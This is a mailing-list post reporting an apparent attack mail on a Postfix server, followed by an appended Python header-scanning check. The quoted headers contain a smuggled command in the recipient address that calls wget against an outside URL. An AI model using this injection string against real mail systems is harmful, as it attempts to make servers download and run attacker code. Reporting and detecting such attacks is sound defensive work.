Hi,

I just received the following mail in my root account's local inbox:

>From b...@dick.com  Fri Apr  9 17:54:55 2010
Return-Path: <b...@dick.com>
X-Original-To: "root+:|wget http://fortunes.in/x1x.php";
Delivered-To: "root+:|wget http://fortunes.in/x1x.php"@somedomain.de
Received: from bluedick (unknown [208.88.6.50])
        by mail.somedomain.de (Postfix) with SMTP id 800FC35405B
        for <"root+:|wget http://fortunes.in/x1x.php";>; Fri,  9 Apr 2010
17:54:55 +0200 (CEST)
Message-Id: <20100409155455.800fc354...@mail.somedomain.de>
Date: Fri,  9 Apr 2010 17:54:55 +0200 (CEST)
From: b...@dick.com
To: undisclosed-recipients:;
Status: RO


This appears to be some kind of attack (possibly not specifically aimed
at postfix) that tries to exploit some mailer problem and trick the
system into executing a command (wget). I cannot tell for sure whether it
succeeded; at least I did not find an "x1x*" file anywhere on my system.

However, it at least succeeded in one thing, namely tricking the
"aliases" mechanism. Normally, mail to root on my system is forwarded to
an external address as per:

root: u...@somedomain.cx

in /etc/aliases

In this case, however, the mail landed in my local inbox, so it appears
postfix did not do what it was supposed to do.

Can anyone tell if this is something that should be addressed as a
security issue? Can this kind of attack potentially do any harm other
than deliver mail to the local inbox?

Here are some system parameters:

I am running Debian 5.0.4, postfix 2.5.5-1.1.

Here is my postconf -n:

alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
append_dot_mydomain = no
biff = no
config_directory = /etc/postfix
inet_interfaces = all
mailbox_size_limit = 0
mydestination = somedomain.de,someotherdomain.de,localhost.localdomain,localhost
myhostname = mail.somedomain.de
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
myorigin = /etc/mailname
readme_directory = no
recipient_delimiter = +
relayhost =
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtpd_banner = $myhostname ESMTP
smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtpd_use_tls = yes

Regards,

Arno


-- 
Arno Schäfer
IT-Beratung & Softwareentwicklung

PHP - Java - Web-Anwendungen
Linux/Unix - MySQL - Hochverfügbarkeit - Security

Weilbornstraße 10 - 63303 Dreieich
mailto: arno_schae...@gmx.de
Tel. +49-6103-699967 | Mobil +49-171-7939236
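As an added example (not Arno's code and not part of Postfix), a small Python check a defender could run over delivered mail headers: it splits the recipient's local part the way recipient_delimiter = + does and flags address extensions that contain characters a mailbox extension never needs (pipes, colons, whitespace, URLs), reporting the base user whose alias the mail should have followed. The header block is constructed from the one quoted in the post.

```python
import re
from email import message_from_string

# Constructed sample in the shape of the headers quoted in the post: the
# recipient's address extension (after the "+" delimiter) carries a shell
# pipeline instead of a mailbox extension.
SAMPLE_HEADERS = (
    'X-Original-To: "root+:|wget http://fortunes.in/x1x.php";\n'
    'Delivered-To: "root+:|wget http://fortunes.in/x1x.php"@somedomain.de\n'
    'Received: from bluedick (unknown [208.88.6.50])\n'
    'From: b...@dick.com\n'
    'To: undisclosed-recipients:;\n'
    '\n'
)

# Characters a legitimate address extension is expected to consist of.
SAFE_EXTENSION = re.compile(r'^[A-Za-z0-9._-]*$')

def split_address(addr):
    """Split addr into (local_part, domain), unquoting a quoted local part."""
    addr = addr.strip()
    if not addr.startswith('"'):
        local, sep, domain = addr.rpartition('@')
        return (local, domain) if sep else (addr, '')
    i, out = 1, []
    while i < len(addr) and addr[i] != '"':
        if addr[i] == '\\' and i + 1 < len(addr):   # backslash escape inside quotes
            i += 1
        out.append(addr[i])
        i += 1
    rest = addr[i + 1:]                              # text after the closing quote
    return ''.join(out), (rest[1:] if rest.startswith('@') else '')

def classify_recipient(addr, delimiter='+'):
    """Split the local part at the recipient delimiter (as recipient_delimiter
    does) and flag an extension that does not look like a mailbox extension."""
    local, domain = split_address(addr)
    user, sep, ext = local.partition(delimiter)
    suspicious = bool(sep) and not SAFE_EXTENSION.match(ext)
    return {'user': user, 'extension': ext if sep else None,
            'domain': domain, 'suspicious': suspicious}

def scan_headers(raw_message, delimiter='+'):
    """One finding per X-Original-To / Delivered-To header whose extension is
    suspicious; 'user' is the alias the base address should have resolved to."""
    msg = message_from_string(raw_message)
    findings = []
    for name in ('X-Original-To', 'Delivered-To'):
        for value in msg.get_all(name, []):
            info = classify_recipient(value, delimiter)
            if info['suspicious']:
                findings.append({'header': name, **info})
    return findings
```

Running scan_headers over a mailbox's headers, or over the recipient field of the mail log, gives the list of base users (here root) whose /etc/aliases entry can then be checked against where the mail actually ended up.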
